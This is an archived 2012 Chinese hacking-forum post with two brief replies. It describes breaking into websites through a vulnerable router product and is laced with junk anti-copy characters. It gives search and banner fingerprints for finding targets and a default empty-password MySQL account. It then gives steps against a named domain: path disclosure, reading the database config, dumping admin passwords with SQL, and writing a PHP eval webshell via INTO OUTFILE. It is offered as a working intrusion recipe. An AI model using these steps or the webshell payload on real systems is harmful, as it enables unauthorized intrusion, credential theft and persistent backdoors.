中国网络渗透测试联盟

标题: 利用某路由器漏洞入侵国外站点 [打印本页]

作者: admin    时间: 2012-12-10 10:30
标题: 利用某路由器漏洞入侵国外站点
  寻找存在漏洞的路由器方法:
3 r. Y2 B/ J0 L3 G# Q  b% r: S3 a# I6 A4 Q
1:google搜索'Raonet Subscriber Ethernet Router'  x* N- D, @% \' f, b5 }) j

2 w* d- B. @! d' J* Y, g! y2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001
* z; O5 Y4 s8 S) ~. H3 B9 @& |# [5 D) d8 |
3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。
, x, l. h1 S* U
5 D1 {0 x1 X' u8 y* G% M//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......' W; k+ J& }# J" y
2 i4 A: h6 Z+ e$ z/ t& ?/ M
4 d7 X" D0 ]: O' O

3 L$ _/ _; A8 `3 D入侵步骤:- A4 v( a6 T$ r
+ A, q. z4 U& L6 V
1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php
* q8 H6 v; ]% |/ ]
4 d  U1 G3 @. K2 q: A7 L2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc1 Z6 v' W* r+ W1 ~- P5 J  h& _
3:得到密码后连接,查看GUI管理密码:+ D4 v4 Z  y8 s! o$ f. |
use ser_5006 Y3 Y5 c: X5 \- n# C( L
select id,passwd from user;
- @, u; |5 a' w- i4:通过数据库写入webshell,执行命令:
! N8 r+ F0 j6 G- b! V5 O# [& xuse mysql;/ ]; y  A. n# ^  |( a7 H2 Y/ g
create table ok(cmd TEXT);1 m7 L- \, Z* w4 J% }
insert into ok values("<?php @eval($_POST[cmd])?>");
+ K! H) S0 Z+ l* Kselect * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";& q; B8 E& |( a
drop table ok;7 q: G- [# [. H- A5 ?% f
  Z1 R; c+ L6 \6 Q& i2 |# x
5:连接后门shell.php
0 U% k9 Y+ n' T" l  S6 r* K6 @! `+ v
6. 搞定!
$ `' p6 @" w/ Y+ T; y. R9 @5 H8 U. F+ c: K4 j- A3 H: W

作者: Anthony~    时间: 2013-7-27 20:06
这个后果可以很严重的说
作者: jos666    时间: 2013-7-29 12:07
不错哦,黑服务器补洞。。




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2